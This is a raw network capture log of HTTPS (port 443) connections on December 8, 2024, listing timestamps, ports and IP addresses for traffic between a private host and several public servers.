                                                                          Dec 8, 2024 20:51:15.887222052 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.891654015 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.891661882 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.891745090 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.895656109 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.895731926 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.895745039 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.895761013 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.895765066 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.895813942 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:16.627976894 CET49821443192.168.2.413.227.8.72
                                                                          Dec 8, 2024 20:51:16.628030062 CET4434982113.227.8.72192.168.2.4
                                                                          Dec 8, 2024 20:51:16.628220081 CET49821443192.168.2.413.227.8.72
                                                                          Dec 8, 2024 20:51:16.628487110 CET49821443192.168.2.413.227.8.72
                                                                          Dec 8, 2024 20:51:16.628509045 CET4434982113.227.8.72192.168.2.4
                                                                          Dec 8, 2024 20:51:16.832109928 CET49822443192.168.2.434.202.133.228
                                                                          Dec 8, 2024 20:51:16.832144022 CET4434982234.202.133.228192.168.2.4
                                                                          Dec 8, 2024 20:51:16.832200050 CET49822443192.168.2.434.202.133.228
                                                                          Dec 8, 2024 20:51:16.832405090 CET49822443192.168.2.434.202.133.228
                                                                          Dec 8, 2024 20:51:16.832417965 CET4434982234.202.133.228192.168.2.4
                                                                          Dec 8, 2024 20:51:16.876370907 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.876447916 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.876797915 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.876858950 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.876910925 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.876983881 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.877077103 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.877132893 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.877443075 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.877504110 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.938711882 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.938724995 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.938746929 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.938760042 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.938994884 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939002037 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939047098 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939058065 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939081907 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939102888 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939105988 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939110041 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939250946 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939254045 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939260960 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939268112 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939282894 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939352036 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939388990 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939398050 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939409018 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939464092 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939475060 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939515114 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939718008 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939723015 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939729929 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.939821959 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:16.939868927 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:16.983334064 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.099129915 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.099157095 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.099174976 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.099246025 CET49784443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:17.099246025 CET49784443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:17.099272966 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.099333048 CET49784443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:17.099570990 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.099642038 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.099664927 CET49784443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:17.099683046 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.099708080 CET49784443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:17.099708080 CET49784443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:17.099714994 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.099723101 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.123338938 CET49823443192.168.2.4142.250.181.100
                                                                          Dec 8, 2024 20:51:17.123378992 CET44349823142.250.181.100192.168.2.4
                                                                          Dec 8, 2024 20:51:17.126285076 CET49823443192.168.2.4142.250.181.100
                                                                          Dec 8, 2024 20:51:17.126713991 CET49823443192.168.2.4142.250.181.100
                                                                          Dec 8, 2024 20:51:17.126728058 CET44349823142.250.181.100192.168.2.4
                                                                          Dec 8, 2024 20:51:17.150181055 CET49824443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:17.150211096 CET4434982420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.150438070 CET49824443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:17.150568962 CET49824443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:17.150579929 CET4434982420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:17.245462894 CET4434981513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.247405052 CET49815443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.247431993 CET4434981513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.247919083 CET49815443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.247929096 CET4434981513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.415052891 CET4434981713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.415503025 CET49817443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.415524960 CET4434981713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.415591002 CET4434981813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.415733099 CET4434981613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.415873051 CET49817443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.415873051 CET49818443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.415879011 CET4434981713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.415889978 CET4434981813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.415891886 CET4434981913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.416179895 CET49816443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.416194916 CET4434981613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.416537046 CET49818443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.416537046 CET49816443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.416543961 CET4434981813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.416557074 CET4434981613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.416624069 CET49819443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.416639090 CET4434981913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.417031050 CET49819443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.417035103 CET4434981913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.436044931 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.436065912 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.436155081 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.436177969 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.436708927 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.436731100 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.436745882 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.436777115 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.436777115 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.436923981 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.436929941 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.436975002 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.436997890 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.437012911 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.437026978 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.437032938 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.437036991 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.437067032 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.437354088 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.446369886 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.446397066 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.446409941 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.446501970 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.446512938 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.446757078 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.475939989 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.475963116 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.476011992 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.476011992 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.476026058 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.477345943 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.503017902 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.503026009 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.503106117 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.503113031 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.503166914 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.532397985 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.532655954 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.537094116 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.537101984 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.537271023 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.537292957 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.537524939 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.566660881 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.566884995 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.662086964 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.662097931 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.662136078 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.662169933 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.662199020 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.662218094 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.662276030 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.664072990 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.664211035 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.664218903 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.664369106 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.668066025 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.668077946 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.668117046 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.668152094 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.668170929 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.668203115 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.668370962 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.672451973 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.672461033 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.672489882 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.672519922 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.672533035 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.672554016 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.673321009 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.678534985 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.678781033 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.678806067 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.679043055 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.709122896 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.709322929 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.709340096 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.709631920 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.713943005 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.713970900 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.714097023 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.714097977 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.714119911 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.714219093 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.732023001 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.732245922 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.732264996 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.732307911 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.735685110 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.735707998 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.735814095 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.735814095 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.735822916 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.735867023 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.742036104 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.742151976 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.742156982 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.742259979 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.744966984 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.744987011 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.745266914 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.745289087 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.745562077 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.769870043 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.770000935 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.770020008 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.770133018 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.774559021 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.774878025 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.774883032 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.775027037 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.797368050 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.797389984 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.797698975 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.797708988 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.797858000 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.804047108 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.804140091 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.804147959 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.804246902 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.828089952 CET4434981513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.828146935 CET4434981513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.828255892 CET49815443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.828663111 CET49815443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.828680038 CET4434981513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.828706980 CET49815443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.828713894 CET4434981513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.831331968 CET49825443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.831362009 CET4434982513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.833332062 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.833349943 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.833422899 CET49825443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.833430052 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.833439112 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.833545923 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.835330963 CET49825443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:17.835340977 CET4434982513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:17.837347031 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.837466955 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.837472916 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.839445114 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.847457886 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.847479105 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.847567081 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.847567081 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.847579956 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.847677946 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.858740091 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.859337091 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.859347105 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.862243891 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.862339973 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.862340927 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.862345934 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.863600016 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.872991085 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.873018026 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.873102903 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.873117924 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.873181105 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.886122942 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.886157036 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.886246920 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.886246920 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.886254072 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.887376070 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.887387991 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.887429953 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.887461901 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.887465954 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.887489080 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.887499094 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.887526035 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.891320944 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.901238918 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.901254892 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.901937008 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.901952982 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.901968956 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.901974916 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.902044058 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.902046919 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.902059078 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.907330036 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.911367893 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.912349939 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.912367105 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.914913893 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.914946079 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.915330887 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.915337086 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.922316074 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.922334909 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.922354937 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.923324108 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.923332930 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.926877022 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.926901102 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.926969051 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.926970005 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.926975965 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.927002907 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.927335978 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.937557936 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.939249992 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.939254999 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.939353943 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.939783096 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.940243006 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.940263033 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.940897942 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.940912008 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.940932035 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.942955017 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.942960978 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.943121910 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.954163074 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.954200983 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.954303980 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.954304934 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.954324961 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.955322027 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:17.957201004 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:17.959327936 CET49814443192.168.2.4150.171.27.10
